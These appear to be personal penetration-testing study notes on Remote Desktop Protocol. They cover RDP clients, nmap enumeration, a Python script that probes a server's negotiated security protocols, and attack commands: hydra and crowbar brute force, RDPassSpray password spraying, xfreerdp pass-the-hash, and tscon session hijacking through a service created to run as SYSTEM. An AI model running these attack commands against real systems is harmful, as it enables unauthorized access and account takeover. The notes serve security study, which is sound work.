Remote Desktop Protocol (RDP)

windowsfundamentals footprinting

Remote Desktop Protocol (RDP) is a protocol used to access a desktop with a graphical interface from another computer over a network connection.

🐊️ Port: 3389/TCP (the session is always set up over TCP; RDP 8+ clients additionally use 3389/UDP as a secondary transport once connected)

On Windows, there is the built-in Windows RDP Client: mstsc.exe.

There is rdesktop (1.1k ⭐).

There is FreeRDP (7.5k ⭐), and there is also a graphical version, xfreerdp-gui (29 ⭐).

$ xfreerdp /u:username /p:password /v:IP
$ # pass-the-hash: only works when the target has Restricted Admin mode enabled
$ xfreerdp /u:username /pth:hash /v:IP
$ # resize with the window, share the clipboard, longer connect timeout (ms), skip the certificate check
$ xfreerdp /dynamic-resolution +clipboard /timeout:50000 /cert:ignore /v:IP /u:x /p:y

There is Remmina (1.9k ⭐, apt install remmina) which has an easy-to-use graphical interface.

  • remmina: start the graphical interface
    • Enter the IP of the target
    • Enter the credentials
    • Connect
  • Then, I would advise toggling "dynamic resolution update" in the left menu, so that you have a bigger screen.
  • In preferences, we should be able to select a keyboard mapping (⚠️ need check)
  • You can scale the screen too

RDP Pentester Notes ☠️

Enumeration

attacking_common_services passwordattacks

  • Using nmap to run scripts (rdp-enum-encryption, rdp-ntlm-info, rdp-vuln-ms12-020)
$ # noisy: the rdp-* scripts send a cleartext routing cookie "mstshash=nmap", visible with --packet-trace and easy to fingerprint on the target side
$ sudo nmap -sV -sC -p 3389 --script rdp* 10.129.201.248
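As an added example (not part of the original notes and not nmap's own code), here is a small Python probe that does what nmap's rdp-enum-encryption script does: it sends an X.224 Connection Request carrying an RDP Negotiation Request, once per candidate protocol, and decodes the Connection Confirm to learn whether the server accepts standard RDP security, TLS, or CredSSP (NLA). The `Cookie: mstshash=<name>` line it sends is the cleartext routing cookie that makes nmap recognisable (mstshash=nmap); the cookie name "probe" and the fallback target IP are assumptions, change them as needed. Knowing whether NLA is enforced matters for the next sections: with NLA, valid credentials are needed before any login screen appears, and xfreerdp's /pth only works against a host in Restricted Admin mode. Byte layouts follow [MS-RDPBCGR] 2.2.1.1 and 2.2.1.2.

```python
#!/usr/bin/env python3
"""Minimal RDP security-protocol probe: X.224 Connection Request / Confirm.

Sends the same first packet as nmap's rdp-enum-encryption script, once per
candidate protocol, and decodes the server's RDP Negotiation Response or
Failure. Structures follow [MS-RDPBCGR] 2.2.1.1 and 2.2.1.2.
"""
import socket
import struct
import sys

# Negotiation structure types
TYPE_RDP_NEG_REQ = 0x01
TYPE_RDP_NEG_RSP = 0x02
TYPE_RDP_NEG_FAILURE = 0x03

# requestedProtocols / selectedProtocol values
PROTOCOL_RDP = 0x00000000        # standard RDP security, no TLS
PROTOCOL_SSL = 0x00000001        # TLS
PROTOCOL_HYBRID = 0x00000002     # CredSSP on top of TLS (NLA)
PROTOCOL_HYBRID_EX = 0x00000008  # CredSSP with early user authorization result

PROTOCOL_NAMES = {
    PROTOCOL_RDP: "standard RDP security (no TLS)",
    PROTOCOL_SSL: "TLS",
    PROTOCOL_HYBRID: "CredSSP / NLA",
    PROTOCOL_HYBRID_EX: "CredSSP / NLA with early user auth result",
}

# failureCode values of RDP_NEG_FAILURE
FAILURE_CODES = {
    1: "SSL_REQUIRED_BY_SERVER",
    2: "SSL_NOT_ALLOWED_BY_SERVER",
    3: "SSL_CERT_NOT_ON_SERVER",
    4: "INCONSISTENT_FLAGS",
    5: "HYBRID_REQUIRED_BY_SERVER",
    6: "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER",
}


def build_connection_request(cookie_user: str, requested_protocols: int) -> bytes:
    """TPKT header + X.224 Connection Request + routing cookie + RDP_NEG_REQ.

    The cookie travels in cleartext before any TLS handshake; nmap sends
    "mstshash=nmap", which is the trace the notes above warn about.
    """
    cookie = f"Cookie: mstshash={cookie_user}\r\n".encode("ascii")
    # RDP_NEG_REQ: type(1) flags(1) length(2, LE, always 8) requestedProtocols(4, LE)
    neg_req = struct.pack("<BBHI", TYPE_RDP_NEG_REQ, 0, 8, requested_protocols)
    # X.224 CR-TPDU after the length indicator: code 0xE0, dst-ref, src-ref, class 0
    x224_body = struct.pack(">BHHB", 0xE0, 0, 0, 0) + cookie + neg_req
    x224 = struct.pack("B", len(x224_body)) + x224_body
    # TPKT: version 3, reserved, total length (big-endian) including the 4-byte header
    tpkt = struct.pack(">BBH", 3, 0, 4 + len(x224))
    return tpkt + x224


def parse_connection_confirm(data: bytes) -> dict:
    """Decode TPKT + X.224 Connection Confirm and the negotiation structure it carries."""
    if len(data) < 11 or data[0] != 3:
        raise ValueError("not a TPKT packet")
    tpkt_len = struct.unpack(">H", data[2:4])[0]
    li = data[4]                      # X.224 length indicator (bytes after it)
    if tpkt_len != len(data) or 5 + li != len(data):
        raise ValueError("TPKT/X.224 length fields disagree with the bytes received")
    if data[5] != 0xD0:
        raise ValueError("not an X.224 Connection Confirm (code 0xD0)")
    neg = data[11:19]                 # after LI(1) + code(1) + dst-ref(2) + src-ref(2) + class(1)
    if len(neg) < 8:
        # Old servers answer with a bare CC-TPDU: only standard RDP security is on offer
        return {"type": None, "protocol": PROTOCOL_RDP,
                "description": "no RDP_NEG_RSP: standard RDP security only"}
    ntype, flags, nlen, value = struct.unpack("<BBHI", neg)
    if nlen != 8:
        raise ValueError(f"bad negotiation structure length {nlen}")
    if ntype == TYPE_RDP_NEG_RSP:
        return {"type": "response", "flags": flags, "protocol": value,
                "description": PROTOCOL_NAMES.get(value, f"unknown protocol 0x{value:x}")}
    if ntype == TYPE_RDP_NEG_FAILURE:
        return {"type": "failure", "flags": flags, "code": value,
                "description": FAILURE_CODES.get(value, f"unknown failure code {value}")}
    raise ValueError(f"unexpected negotiation type 0x{ntype:02x}")


def probe(host: str, port: int = 3389, cookie_user: str = "probe", timeout: float = 5.0) -> dict:
    """Ask the server for each protocol in turn; one fresh TCP connection per request."""
    results = {}
    for label, proto in (("rdp", PROTOCOL_RDP), ("tls", PROTOCOL_SSL), ("nla", PROTOCOL_HYBRID)):
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(build_connection_request(cookie_user, proto))
            data = s.recv(64)         # a Connection Confirm is at most 19 bytes
        results[label] = parse_connection_confirm(data)
    return results


if __name__ == "__main__":
    # assumed placeholder target: the IP used in the nmap example above
    target = sys.argv[1] if len(sys.argv) > 1 else "10.129.201.248"
    for label, result in probe(target).items():
        print(f"request {label:>3}: {result['type'] or 'bare CC'} -> {result['description']}")
```

Run it as `python3 rdp_probe.py <host>`. If the plain-RDP request comes back as a failure with HYBRID_REQUIRED_BY_SERVER, NLA is enforced and every guess in the password attacks below has to complete a CredSSP handshake; a server that still answers the plain-RDP request with a bare Connection Confirm is an old, unhardened one.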

Foothold

password_attacks attacking_common_services passwordattacks

  • The password may be weak and vulnerable to brute force. Check the account lockout policy first: with a threshold of a few failed attempts, 64 parallel guesses (crowbar -n 64) lock the account out almost immediately, so either keep the thread count low or spray one password across many users instead.
$ hydra -L user.list -P password.list rdp://IP -V
$ # crowbar: -b protocol, -s target CIDR, -u single user (or -U file), -C password file, -n threads
$ crowbar -b rdp -s IP/32 -u username -C password.list -v -n 64

There is also RDPassSpray (0.6k ⭐).

$ python3 RDPassSpray.py -u username -p password -t IP:port
$ python3 RDPassSpray.py -U usernames.lst -p password -t IP:port
$ python3 RDPassSpray.py [...] -d domain
$ python3 RDPassSpray.py [...] -T rdp_servers.lst

Exploitation

attacking_common_services

  • RDP Session Hijacking: attach to another user's session (typically a disconnected one) without knowing that user's password. tscon does this, but across users it only works when it runs as SYSTEM, so a plain administrator shell is not enough. The target session ID and our own session name (e.g. rdp-tcp#13) are the ID and SESSIONNAME columns of query user / qwinsta.
PS> tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME}

On Windows Server prior to 2019, a local administrator can get SYSTEM by wrapping the tscon call in a service, since services run as LocalSystem (use sc.exe explicitly: in PowerShell, sc alone is an alias for Set-Content):

PS> sc.exe create sessionhijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#13"
PS> net start sessionhijack

Here 2 is the session ID to take over and rdp-tcp#13 is our own session; the hijacked desktop replaces ours. net start reports an error because cmd.exe never answers the service control manager, but tscon has already run by then. From Server 2019 onwards this no longer works without the target user's password.

Well-known CVEs

Additional Tools


👻 To-do 👻

Stuff that I found, but never read/used yet.